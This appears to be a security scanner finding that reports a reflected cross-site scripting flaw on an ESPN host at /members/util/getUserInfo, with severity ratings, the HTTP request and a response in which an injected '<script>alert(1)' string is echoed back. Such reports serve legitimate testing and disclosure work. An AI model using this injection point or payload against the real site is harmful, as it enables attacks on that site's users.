1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | https://r.espn.go.com |
Path: | /members/util/getUserInfo |
GET /members/util/getUserInfo Host: r.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Content-Length: 108 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 p3p: CP=CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE runOmnitureIndependently7e5ac<script>alert(1)< |